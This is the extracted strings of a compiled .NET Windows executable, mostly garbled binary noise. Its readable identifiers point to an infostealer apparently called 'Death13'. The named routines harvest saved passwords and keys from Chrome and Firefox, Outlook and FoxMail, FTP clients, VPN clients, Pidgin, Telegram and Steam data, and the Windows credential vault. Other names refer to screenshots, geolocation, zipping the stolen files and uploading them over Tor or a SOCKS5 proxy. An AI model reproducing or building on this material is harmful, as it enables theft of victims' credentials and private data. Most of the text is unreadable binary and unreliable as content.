!This program cannot be run in DOS mode.
`.rsrc
@.reloc
Xa NFb
X U]4h +
X r3\m
X ,C2s N
X <A^< S\
Xa $e"
F *Wzoa 7`
a 5xDe@
a *z/|@
Xa dK:$ K1
Xa Kt~Q
Xa dBeJ
X :ne{
Xa Lp,
X iU:r
X @vy} Cv
X }*#'
Xa ^! } E/
Xa ,,v)
0a ?C$
zS'"a
:x|>a
a ,Qbc@
`L bIgGa
X @es-
X iE^D P3
X <m>t
q%v ;G
\L-=
i )^t0a
ER< Bo
sY~ nr
X !8T" 2
m N ]`a 2
e|O* L7
JV6a V3
/ "{Q2a
#kF1 ^:
ga }QJV@
&l E#Xwa (
7c#F
ng:a BH]
Ua T6]Q@
kIh |lPba
f&7a W
Xa F43s i
Ba #l"
fbzfa
<qP^ L&
B2K$
P ?X6Oa \
vQ)Z
u(a W$
q>c /l
9a @)x0@
qc harUa ~
X g5+_
Xa ib<<
X b7.' &Q
X %%@T
Pf< N
a J#yh@
Sa ~|(V@
"l'}
dEw `(
Xa lj^
X 8Q-u
Xa Jw^R
Xa &yM|
X Z5az
X 7P{+
X +d/v
Xa +fW
$e^ {|
X O]C
X G~a/ P
K. xx
Xa Hnqf 9V
Xa TM>@
_+q _u
X c49|
X !p_#
<*n Kw
Xa p0:H
`ASl u
,\a E6
m@tP j
}%?,a
#@kn 5
X /p^J
/L8T A
AP]&
00.Wa
Xa 4sG!
bcL0 gcYga
ta ?r>
:-a bGrE@
aT +>:
?3Sa I
Xa XoFY
_a 5xH<@
a D<{@
% B8w^a
a CeK)@
' $>6sa
boh] v#
X ;:3$ x
X ~Ehh
X LE{3
Xa mwO"
Xa Q)R$
X "TgA
Xa s~_V ;K
Dl9 Qc
X tC%`
X Q5Vn
Xa H+QP
X y=ik Ev
4Vd Os
'qa ;Q
w=a Ovy&@
:^a ~C
z_9p
4o_C
a $tkJ@
s ~=,3a
X Kt|*
."u i
Xa ,jmo bY
X mhqy
X X v~
Xa m#xb
BX Nu
Q~E 9H
6oa OQR9@
f>a }4
S j 7ka t
jn7%
Xa <xl
y$" m/
Xa Q5
X oeNm
Xa t.ah
~# Q>
wwO QJ
X wbkK
Xa <Jt"
Xa 1[Mq c
X um9
Xa Ol"_
X %fW'
X gh2 *
Xa (G;
TW*.
vxa L"
a g'4P@
q\e|
a)Ra t=L.@
S)a wy
wa 44:
ca i O|@
Xa :v+{
uYs Hl
n$a ^A+}@
A_oa *a
:?a#
X /F;B 1q
X USk
X ~e@2
8H< 7]
S|m q;
Xa PE-,
BYd 79
Xa lL[E
X (zCC
X 1iA| 7
Xa }5ny
FxD -p
X YR 5 q
Xa 6RZ
X `ySK
X =T|j
Xa JS[\ Q,
RVk wF
Xa <MsS mc
Xa !wEm
C FP7 a ^
E[)z 8(D
a }smj@
]a `yUo@
a `@b/@
>a sF4C@
4r Ht"Aa
Xa HO[} S-
Xa Kg{j
Xa B;g
y$_ }8
X [iV{ E
X Pe6G L
Q7| ;/
X YD>a
X s'?
Xa 4Hf>
Xa cdZz
X >9 O
X n86Y
)(d A4
|>/ #d
X %4n/ B^
X @Ij&
Xa gPb{
X #6LT
Xa uSR) D
X )RQg
Xa v^3O +-
%17 cQ
X spP( n
X UmVk
X _.es
Xa WHW
Xa +i!? g:
X z7">
Xa wijq
X l fh j
Xa fpuk "
`+v hl
X q_wx
Xa A6l
X ,9{Z
G.G Su
X y&T=
B6$ !V
_b? %m
X |2V0
X J[s[
mPX iP
=sJ 7=
}Qf <a
mC *=
Xa :{&$
Xa 0![#
Xa h]-
OS~ `h
X y]_2
X w;zP
X w >'
X K#\s
Xa |%3F
Xa {OE~ I2
X Yp;' 6
X p9UH
Xa v{c[
X \+(/
@~U Oz
ev< |%
Xa Hg,z
Xa 1] E
X [kR;
Xa f+\; -
+O4 K+
Xa T[*Z
1 oK
X ^JAa
Xa 7F
n2[ |R
X *OwD @c
1 a >6
8:mi n
0='4
q(n c%o
^ OfF%a
Au-R
Xa XZ2
X C*cH Vf
Xa if}[ C
<xN cO
/ 0;hoa
X Dq#?
Xa 2 /.
Xa =a^P
}a _1|i@
Xa fwR4 9#
*o5 I,
X ;]CP
Xa v_z
X yLy& 18
X 0{^R ~S
Xa IEln 0<
Xa S<&n
,'S kN
X #7U CX
v/h :G
X :<cZ
Xa #?j wj
v4.0.30319
#Strings
* 3 J S |
"$"6"H"["q"
$[$d$k$
%4%?%x%
(*(I(S(e(
)$),)R)f)
*'*C*t*
+=+K+_+
+h,s,|,
- -*-I-`-o-
&(&u'|(
)D,U,_,
<>9__1_10
<Create>b__1_10
<vaultItemCount>5__10
<EnumerateCredentials>d__10
<EnumerateBrowsers>d__10
j4G730
w5XL40
jtwoG0
lsWqP0
<EnumerateCredentials>g__GetVaultElementValue|10_0
<>9__0_0
<EnumerateCredentials>b__0_0
<>c__DisplayClass21_0
<>9__1_0
<Create>b__1_0
<Collect>b__1_0
<>c__DisplayClass1_0
<>9__12_0
<.ctor>b__12_0
<>9__2_0
<Collect>b__2_0
<>9__13_0
<MatchFiles>b__13_0
<>c__DisplayClass13_0
<EnumerateFiles>b__14_0
<>9__0
<Remove>b__0
<EnumerateExtensionFiles>b__0
<EnumerateCredentials>d__0
<ExtractItems>d__0
t_4Vl0
yDD6s0
am4Ew0
<structAddress>5__11
<EnumerateProfiles>d__11
kgPOD1
oA7QX1
<>9__1_1
<Create>b__1_1
<>9__2_1
<Collect>b__2_1
<MatchFiles>b__13_1
<>9__14_1
<EnumerateFiles>b__14_1
<>8__1
<EnumerateExtensionFiles>d__1
<EnumerateCredentials>d__1
<ExtractFolders>d__1
Nullable`1
IEnumerable`1
Stack`1
Action`1
IEnumerator`1
List`1
<>7__wrap1
w4aky1
<>m__Finally1
HMACSHA512
__StaticArrayInitTypeSize=12
<j>5__12
yBQ832
__StaticArrayInitTypeSize=32
advapi32
Microsoft.Win32
ReadUInt32
ToUInt32
ReadInt32
ToInt32
<get_Children>d__42
kf1hG2
ruXWQ2
nfYsT2
<>9__1_2
<Create>b__1_2
<decryptedPassword>5__2
<rkPath>5__2
<rk>5__2
<OSMajor>5__2
<count>5__2
<MatchFiles>b__2
<EnumerateCredentials>d__2
Func`2
KeyValuePair`2
Dictionary`2
hodbj2
j07Oo2
<>7__wrap2
<>m__Finally2
kZkny2
apPW03
byN913
<MatchFiles>d__13
<get_Children>d__23
rnRFZ3
<>9__1_3
<Create>b__1_3
<rkWinSCP>5__3
<rk>5__3
<OSMinor>5__3
<pCredentials>5__3
<EnumerateCredentials>d__3
<>7__wrap3
eVRjt3
<>m__Finally3
rshD04
zTcH04
<get_DeepChildren>d__44
FromBase64
ToBase64
UInt64
ReadInt64
ToInt64
qjokS4
kVKCY4
<>9__1_4
<Create>b__1_4
<VAULT_ITEM>5__4
<browserName>5__4
<n>5__4
<rkApp>5__4
<fs>5__4
<>7__wrap4
uYs7q4
qaFe85
y6QRG5
bffKH5
nGhWS5
<>9__1_5
<Create>b__1_5
<roamingDataPath>5__5
<rk>5__5
<vaultCount>5__5
u5gue5
yIdDi5
<>7__wrap5
aDwUq5
or9pu5
ojt7v5
jymp16
ReadUInt16
ToUInt16
ReadInt16
<get_Children>d__26
__StaticArrayInitTypeSize=6
yn4eR6
jfWbS6
bY_8V6
<>9__1_6
<Create>b__1_6
<rkSession>5__6
<guidAddress>5__6
iSN9b6
tv6yo6
<>7__wrap6
enpOz6
zxvDC7
VAULT_ITEM_WIN7
VaultGetItem_WIN7
aUM8O7
trFFU7
<>9__1_7
<Create>b__1_7
<vaultSchema>5__7
i3Zva7
jDb8f7
mmPXj7
rURLp7
<>7__wrap7
jUN6r7
mAHfv7
<EnumerateBrowsers>d__18
get_UTF8
EncodeUTF8
enWAN8
VAULT_ITEM_WIN8
VaultGetItem_WIN8
pnlBP8
owdYV8
<>9__1_8
<Create>b__1_8
<i>5__8
<key>5__8
myckq8
bOCnu8
<EnumerateProfiles>d__19
hda439
lu_Z89
lZgu99
yMxNN9
sAUFT9
yPbqW9
<>9__1_9
<Create>b__1_9
<vaultHandle>5__9
ftRpe9
rEQD2A
um109A
csYGEA
uRHOGA
eSA1UA
j6_FdA
kt6XjA
iPcLuA
pv61mB
s3nawB
heIt5C
oqMEFC
rxBOiC
wCGwnC
cy2euC
rcZRwC
eci7yC
eaEH0D
iBhN6D
xTZv6D
VAULT_SCHEMA_ELEMENT_ID
b4OGcD
fnfTfD
xFDggD
qo_hoD
lBSlxD
y8WQ2E
hCR47E
oyxP9E
VAULT_ELEMENT_TYPE
pxbQfE
vMlh0F
bHPR3F
vUi_AF
fUm7dF
dro7jF
cRbdrF
nOxprF
fsgADG
s7S6FG
gt2YQG
bqnhXG
y5PQaG
x3wHdG
iBNijG
qOw8mG
x3sKoG
cAO4sG
vmqWxG
nqbT0H
cHYz3H
vfp84H
iuwk4H
rSeA6H
ulZQMH
kERxdH
ocLzlH
gWd5sH
n50UvH
svTwwH
aTMO5I
ktLsAI
selFFI
gU0RFI
get_ASCII
q4NBPI
jYMKfI
m9_ojI
flUsoI
pg55xI
lGQixI
u1myyI
gb4LHK
dpLNWK
woHinK
ry4grK
nxUf4L
o6o4FL
cDycXL
xxBOYL
kyWgnL
mqwHvL
dx0Z3M
gfc_LM
aDlNaM
byOZgM
tQKVhM
nrnEjM
sruNwM
bQ655N
nP8LFN
ol6vGN
fbErHN
lIMENN
a4yiPN
j513kN
qnuyoN
f28yuN
ijrVAO
kUD3BO
lgouCO
uSe1DO
bkldDO
System.IO
tz0GSO
nYDojO
qtOSpO
n48NqO
nUiY5P
k5AC8P
u_aH8P
mZxMaP
egTulP
jOwR0Q
yXTb1Q
pMsq3Q
eYG8CQ
e8bqEQ
hmrIfQ
xrBFgQ
ynxvgQ
vEfGkQ
dK6zkQ
qfWP3R
gOGzPR
g83ZSR
pWAieR
pPcLmR
qiPS0S
avw08S
k34fHS
wNHoZS
k7COcS
aqewcS
n2OkCT
cqiWGT
VAULT_ITEM_ELEMENT
bj_2cT
bwWVuT
v_B_9U
wkpjAU
edbAOU
qP0wPU
i3eeSU
xq7TYU
jBOYZU
l5htyU
yvZT0V
gaS0FV
nQwxFV
get_IV
GenerateIV
bkCgnV
iQVk2W
iPrFWW
kWIFpW
bPZMrW
sTAqrW
fe4G8X
yZ0uAX
aPSUGX
lxHRXX
pUtEYX
zikjZX
iwxpfX
hLm24Y
r_AC5Y
wAkGRY
gZ0uUY
vDE6WY
yffUYY
qN2EZY
pmkVfY
wG7afY
oX3DpY
wd6frY
e_AeCZ
eH8xGZ
mXUoIZ
wPimLZ
mqYbUZ
byF5eZ
dItND_
z7EVF_
s1MTS_
x9_wT_
jc5eU_
value__
m_eud_
xinV9a
jU78Ea
mSRcEa
ymuzIa
wBadca
evETna
rYjlna
mqoQqa
DownloadData
UploadData
ProtectedData
EncryptData
eiPCua
dVPq3b
hvkc6b
s68FPb
dHrSXb
pbCGdb
mscorlib
CredentialBlob
lhdDsb
hcvuvb
yjw25c
pWQb6c
mWmbCc
l6ILDc
t8CzIc
iq_fQc
pioSRc
f0vcac
aMASdc
IsNumeric
System.Collections.Generic
Microsoft.VisualBasic
aIndentInc
ExtractFileAsync
AddStreamAsync
ojl6qc
Itzkuyjeiqkynfbpgjlcyc
f7F9Bd
get_Id
set_Id
SchemaId
schemaId
get_CurrentManagedThreadId
<>l__initialThreadId
SchemaElementId
w8QfQd
Thread
Download
torUpload
RijndaelManaged
LastModified
IsInstalled
Undefined
get_HasExited
pPackageSid
get_IsValid
vaultGuid
NewGuid
jxYBjd
GetField
TrimEnd
ReadToEnd
AppEnd
ExecuteCommand
Append
get_Second
Method
WriteEndRecord
WriteCentralDirRecord
get_Password
set_Password
DecryptOutlookPassword
GetNetworkPassword
y9ahwd
nSMoxd
p2Cm6e
fgoHEe
tZY3We
xZOWXe
Replace
IdentityReference
Resource
GetHashCode
set_Mode
FileMode
PaddingMode
CryptoStreamMode
CompressionMode
CipherMode
m_Node
SelectSingleNode
XmlNode
FromImage
get_Message
get_UILanguage
InputLanguage
vN4ghe
GetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_AsDouble
set_AsDouble
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
vaultHandle
StopBundle
Rectangle
Single
AddFile
ParseFile
ExtractFile
get_Profile
set_Profile
<>3__profile
IsInRole
WindowsBuiltInRole
Console
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_OSName
get_CPUName
get_GPUName
get_Name
set_Name
get_TwoLetterISOLanguageName
get_FileName
set_FileName
GetTempFileName
GetFileName
get_profileName
set_profileName
get_MachineName
GetElementsByTagName
get_FullName
get_WindowsVersionName
get_UserName
get_BrowserName
set_BrowserName
GetName
TargetName
GetProcessesByName
AssemblyName
pszCredentialFriendlyName
get_DirectoryName
GetDirectoryName
NormalizedFilename
get_Username
set_Username
get_Hostname
set_Hostname
FromFileTime
ToFileTime
DosTimeToDateTime
GetLastWriteTime
SetLastWriteTime
SetCreationTime
DateTimeToDosTime
SetLastAccessTime
ModifyTime
ReadLine
AppendLine
WriteLine
get_NewLine
Combine
LocalMachine
get_Inline
set_Inline
p4gOpe
Escape
DataProtectionScope
ValueType
get_DriveType
SecurityProtocolType
GetType
SocketType
System.Core
PtrToStructure
get_InstalledUICulture
get_Culture
get_InvariantCulture
Capture
ReadOnlyCollectionBase
System.IDisposable.Dispose
TryParse
Reverse
Geolocate
Create
Deflate
CredEnumerate
get_LocalState
set_LocalState
<>1__state
Delete
get_CanWrite
ThreadStaticAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
IteratorStateMachineAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
get_Minute
ReadByte
ToByte
get_Value
set_Value
get_HasValue
TryGetValue
set_Expect100Continue
Receive
Remove
get_Size
CredentialBlobSize
CompressedSize
FileSize
get_HashSize
set_BlockSize
chunkSize
get_DiskSize
get_MaximumSize
set_MaximumSize
HeaderSize
get32bitSize
set_KeySize
SuppressFinalize
Resize
jFMR1f
essk4f
azO1Ef
PadToMultipleOf
SizeOf
get_ItemOf
LastIndexOf
fYtAPf
Iflthdadndchxqfnboahdf
spxfef
twZrmf
aoB3xf
jYgkyf
hnMtDg
nG3RMg
idGySg
meMSTg
b8IG_g
get_Tag
get_Jpeg
cp9ufg
lP3gmg
System.Threading
set_Padding
GetEncoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
EscapeDataString
DownloadString
EnumerateToString
get_IsString
GetString
Substring
System.Drawing
get_AsLong
set_AsLong
qpgY5h
wnzKah
ForEach
IsMatch
ComputeHash
ProcessExecutablePath
CreateFilePath
CreateGrabberZipPath
GetTempPath
GetFolderPath
get_Width
get_Length
set_Length
SetLength
EndsWith
StartsWith
get_Month
zUQizh
kNz4Di
jVCYUi
mCxK_i
v0gzii
glQRji
PtrToStringUni
ozf3pi
mHcopi
oKKu5j
w9DV6j
zETd7j
oHOCCj
tKErKj
ixqfbj
jjGoij
bTmDmj
wXjpsj
ufOStj
fQ_ICk
lRzYCk
fbe8Nk
pxKTZk
bXon_k
FlushFinalBlock
TransformFinalBlock
get_CanSeek
Isuwifzihjwqabvnrwrcqk
c9Lpqk
k_mmrk
p_AtIl
jV3IOl
Illegal
Marshal
ReadCredential
NativeCredential
Decimal
System.Security.Principal
WindowsPrincipal
get_Model
bUFNkl
vaultcli.dll
get_IsNull
System.Xml
get_InnerXml
set_SecurityProtocol
snTjol
get_AsBool
set_AsBool
tm6zql
k2dv2m
w6h94m
ee08Im
iBgY_m
AddStream
FileStream
DeflateStream
get_EndOfStream
CryptoStream
MemoryStream
zTfDbm
get_Item
set_Item
VaultGetItem
vaultItem
OperatingSystem
get_Algorithm
set_Algorithm
SymmetricAlgorithm
KeyedHashAlgorithm
jSfQpm
ICryptoTransform
aDictEnum
aArrayEnum
gAaGvm
yu0pym
f3HO7n
uT4THn
uAvPLn
qVD0Xn
reXNYn
get_IsBoolean
IsLittleEndian
CopyFromScreen
d5zken
get_Children
get_DeepChildren
LastWritten
SeekOrigin
ywZPmn
get_Extension
localExtension
get_OSVersion
get_Version
get_BitVersion
System.IO.Compression
get_Application
set_Application
get_Location
get_UserInformation
System.Globalization
System.Reflection
InputLanguageCollection
MatchCollection
GroupCollection
ManagementObjectCollection
get_Position
set_Position
SearchOption
IOException
InvalidDataException
NotSupportedException
ArgumentNullException
ApplicationException
InvalidOperationException
FormatException
ArgumentException
get_ScreenResolution
StringComparison
<>3__json
bcDttn
SocketShutdown
cARRxn
sczW7o
jfh_Fo
vCyQMo
n4qARo
CopyTo
xRf7Xo
yqFwXo
yod3ao
ReadExtraInfo
CreateExtraInfo
FieldInfo
ReadFileInfo
CultureInfo
DriveInfo
FileSystemInfo
set_StartInfo
ProcessStartInfo
DirectoryInfo
pNOmho
qi6Bwo
p6265p
bHoY5p
z7P2Np
Bitmap
ugONep
FilenameInZip
get_Bmp
TimeStamp
bxLppp
j5H8rp
cdtbup
vz1yLq
go9XOq
pILtOq
dfxmTq
System.Linq
get_Linq
qV7u1r
gtwNFr
izwnHr
yfRTKr
x7sxRr
jiRCVr
fBcxYr
get_Year
ToChar
DirectorySeparatorChar
DecodeNextChar
get_IsNumber
WriteLocalHeader
StreamReader
TextReader
BinaryReader
AesCryptoServiceProvider
IFormatProvider
get_EscapeBuilder
WriteToStringBuilder
SpecialFolder
Buffer
ServicePointManager
ManagementObjectSearcher
SecurityIdentifier
ToUpper
IsUpper
get_Manufacturer
CurrentUser
get_chromeBrowser
set_chromeBrowser
get_firefoxBrowser
set_firefoxBrowser
BinaryWriter
filter
BitConverter
ToLower
ReadCentralDir
get_Major
get_Minor
set_RedirectStandardError
Authenticator
IEnumerator
m_Enumerator
aEnumerator
ValueEnumerator
LinqEnumerator
ManagementObjectEnumerator
System.Collections.Generic.IEnumerable<System.Text.Json.JSONNode>.GetEnumerator
System.Collections.Generic.IEnumerable<Death13.Recovery.Browsers.Chrome.ChromeProfile>.GetEnumerator
System.Collections.Generic.IEnumerable<Death13.Recovery.Browsers.Firefox.FirefoxProfile>.GetEnumerator
System.Collections.Generic.IEnumerable<Death13.Utils.Models.Extension>.GetEnumerator
System.Collections.Generic.IEnumerable<System.IO.FileInfo>.GetEnumerator
System.Collections.Generic.IEnumerable<Death13.Recovery.Browsers.Chrome.ChromeBrowser>.GetEnumerator
System.Collections.Generic.IEnumerable<Death13.Recovery.Browsers.Firefox.FirefoxBrowser>.GetEnumerator
System.Collections.Generic.IEnumerable<Death13.Utils.Models.Account>.GetEnumerator
System.Collections.IEnumerable.GetEnumerator
KeyEnumerator
.cctor
CreateDecryptor
CreateEncryptor
passwordVaultPtr
ReadIntPtr
get_Hour
y9iG3s
hNeW4s
uUXGDs
zYdCEs
muDZGs
wH4Pas
TargetAlias
Graphics
System.Diagnostics
GetBounds
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
DebuggingModes
get_ChildNodes
get_InstalledInputLanguages
Matches
GetDirectories
FetchProxies
EnumerateFiles
MatchFiles
EnumerateExtensionFiles
GetFiles
EnumerateProfiles
NumberStyles
GetNetworkNames
GetSubKeyNames
get_Databases
set_Databases
GetHostAddresses
Attributes
ReadBytes
ReadAllBytes
WriteAllBytes
ToBytes
GetAddressBytes
GetBytes
get_Values
GetDrives
UpdateCrcAndSizes
SocketFlags
dwFlags
ProcessCommandLineArgs
<>4__this
s2j3js
EnumerateCredentials
pCredentials
Equals
VaultEnumerateItems
ExtractItems
System.Windows.Forms
Contains
Conversions
System.Text.RegularExpressions
get_Locations
set_Locations
System.Collections
StringSplitOptions
RegexOptions
get_Patterns
set_Patterns
get_Groups
get_Chars
ExtractFolders
RuntimeHelpers
EnumerateBrowsers
FileAccess
get_Success
Process
get_torprocess
set_torprocess
IPAddress
get_IpAddress
set_IpAddress
System.Net.Sockets
VaultEnumerateVaults
pPropertyElements
set_Arguments
get_Exists
get_Keys
nB6L3t
RemoveAt
ElementAt
j7HKDt
i0GRDt
hvmBQt
bjaGTt
cx88Vt
Concat
AppendFormat
ImageFormat
get_AsFloat
set_AsFloat
m_Object
ManagementBaseObject
get_AsObject
get_IsObject
ManagementObject
Select
Collect
Connect
Unprotect
CreateOrGet
System.Net
Socket
System.Collections.IEnumerator.Reset
GetFileOffset
HeaderOffset
offset
get_Height
op_Implicit
op_Explicit
set_DefaultConnectionLimit
WaitForExit
get_Salt
set_Salt
VaultOpenVault
get_Default
SingleOrDefault
GetValueOrDefault
UnsignedInt
GetBytesFromInt
get_AsInt
set_AsInt
aIndent
WebClient
System.Management
pResourceElement
ParseElement
XmlElement
pAuthenticatorElement
get_DocumentElement
pIdentityElement
Comment
Environment
XmlDocument
get_Parent
System.Collections.Generic.IEnumerator<System.Text.Json.JSONNode>.Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Chrome.ChromeProfile>.Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Firefox.FirefoxProfile>.Current
System.Collections.Generic.IEnumerator<Death13.Utils.Models.Extension>.Current
System.Collections.Generic.IEnumerator<System.IO.FileInfo>.Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Chrome.ChromeBrowser>.Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Firefox.FirefoxBrowser>.Current
System.Collections.Generic.IEnumerator<Death13.Utils.Models.Account>.Current
System.Collections.IEnumerator.Current
System.Collections.Generic.IEnumerator<System.Text.Json.JSONNode>.get_Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Chrome.ChromeProfile>.get_Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Firefox.FirefoxProfile>.get_Current
System.Collections.Generic.IEnumerator<Death13.Utils.Models.Extension>.get_Current
System.Collections.Generic.IEnumerator<System.IO.FileInfo>.get_Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Chrome.ChromeBrowser>.get_Current
System.Collections.Generic.IEnumerator<Death13.Recovery.Browsers.Firefox.FirefoxBrowser>.get_Current
System.Collections.Generic.IEnumerator<Death13.Utils.Models.Account>.get_Current
System.Collections.IEnumerator.get_Current
GetCurrent
<>2__current
IPEndPoint
get_Count
AttributeCount
vaultItemCount
get_IterationCount
set_IterationCount
dwPropertiesCount
vaultCount
get_RAMAmount
iuV7ot
MakeScreenshot
GetPathRoot
Decrypt
ThreadStart
TrimStart
AppStart
Convert
UnsignedShort
XmlNodeList
Persist
get_Host
tAIQtt
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
ToUTF8Text
ReadText
WriteAllText
get_InnerText
aC4dzt
jHpf1u
fsab9u
pEMdBu
khyRDu
xXTORu
shhodu
lfa1hu
jroeru
gNwtQv
ebYOYv
Ivrbxyedbcsyhywfgmnmhv
eRu2mv
awD37w
vOU37w
ecD6Iw
pY6lNw
n1WcPw
get_Now
set_CreateNoWindow
cSO7ww
wD_Exw
oeZYxw
hBXAzw
uTHq6x
iB9u8x
eWx4Cx
yOOjCx
nvc8Dx
w2xuMx
p_5RQx
ahgTZx
pAa09y
qicRBy
dwXlDy
bLpjEy
get_Day
m_Array
ProtectedArray
ConvertHexStringToByteArray
InitializeArray
ToArray
ToCharArray
get_AsArray
get_IsArray
lgsKdy
get_IsReady
get_bundleIsReady
get_Key
set_Key
OpenSubKey
get_MasterKey
set_MasterKey
GetMasterKey
HasKey
ContainsKey
RegistryKey
System.Security.Cryptography
GetExecutingAssembly
get_AddressFamily
BlockCopy
get_PathAndQuery
get_Directory
get_UserDataDirectory
set_UserDataDirectory
GetTdataDirectory
AddDirectory
get_profileDirectory
set_profileDirectory
CreateDirectory
GetFoxMailDirectory
GetSteamDirectory
get_SystemDirectory
get_ProfilesDirectory
set_ProfilesDirectory
get_RootDirectory
ZipFileEntry
get_Country
set_Country
Registry
get_City
set_City
get_Capacity
set_Capacity
op_Equality
op_Inequality
System.Security
WindowsIdentity
IsNullOrEmpty
yxuTwy
vfTgwy
gRHixy
ConnectToSocks5Proxy
hNTN6z
dsYgCz
bfx3Dz
u7CPIz
kLOYRz
hPZzXz
xAQdcz
vTSmmz
WrapNonExceptionThrows
asdsdfw3423
asdfsfw3er234
asdf234asdf
fsad234sdaf3
SFw345w5t 2222
$d23bc401-1c9d-42d8-a1e7-6af7b7b18d19
234.234.4322.1234
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.2
Death13.Recovery.Emails.FoxMail+<EnumerateCredentials>d__0, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Emails.Outlook+<EnumerateCredentials>d__3, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Windows.Networks+<EnumerateCredentials>d__2, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Windows.CredentialManager+<EnumerateCredentials>d__3, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Windows.VaultCli+<EnumerateCredentials>d__10, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
yDeath13.Recovery.FTP.Snowflake+<ExtractItems>d__0, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
{Death13.Recovery.FTP.Snowflake+<ExtractFolders>d__1, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.FTP.Snowflake+<EnumerateCredentials>d__2, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.FTP.CoreFTP+<EnumerateCredentials>d__0, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.FTP.FileZilla+<EnumerateCredentials>d__0, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
~Death13.Recovery.FTP.WinSCP+<EnumerateCredentials>d__0, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.VPN.AzireVPN+<EnumerateCredentials>d__1, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.VPN.WindscribeVPN+<EnumerateCredentials>d__0, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.VPN.EarthVPN+<EnumerateCredentials>d__0, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.VPN.NordVPN+<EnumerateCredentials>d__1, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Messengers.Pidgin+<EnumerateCredentials>d__1, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Browsers.Firefox.FirefoxBrowser+<EnumerateBrowsers>d__10, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Browsers.Firefox.FirefoxBrowser+<EnumerateProfiles>d__11, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Browsers.Chrome.ChromeBrowser+<EnumerateBrowsers>d__18, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Browsers.Chrome.ChromeBrowser+<EnumerateProfiles>d__19, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
Death13.Recovery.Browsers.Chrome.ChromeExtensions+<EnumerateExtensionFiles>d__1, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
uDeath13.Grabber.FileGrabber+<MatchFiles>d__13, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
uSystem.Text.Json.JSONNode+<get_Children>d__42, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
ySystem.Text.Json.JSONNode+<get_DeepChildren>d__44, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
vSystem.Text.Json.JSONArray+<get_Children>d__23, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
wSystem.Text.Json.JSONObject+<get_Children>d__26, hnuix, Version=1234.231.123.1234, Culture=neutral, PublicKeyToken=null
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
S"S5S9W
W&W*W5W9X
X.X2X5X9]
]5]6]9]:i5l
l5l9l>lBn5x
x5x9xFxJy
( ;">$@&B(M*Q,R.S0T2V5W9X;Y=]@bBdDeKgLiPlSsUtnvpwqxrytzv{x|
! " $#&%(',+;:=<><@?BAJIMLRQSQUTWVXVZY\[][jikilionpntsutvswsxsyszs|{~}
!6$!*6$3(
ogbCQo
m4GUFV
$;'460
s13HCQ
:R+-{SA_YQy->QW-~]>^%S
yhciLh
<Rh9 0zP;0
! 'zP*/
!>Rh?>1
4$Rh(4$
(&RFcR5
?#%h )-
;95h;61
&:0h$9,
$93h#)6
0)0_3>2
8b*r<e
b8p(f?GM
%c.G*{/t9`(p5PMC
?;'/?8
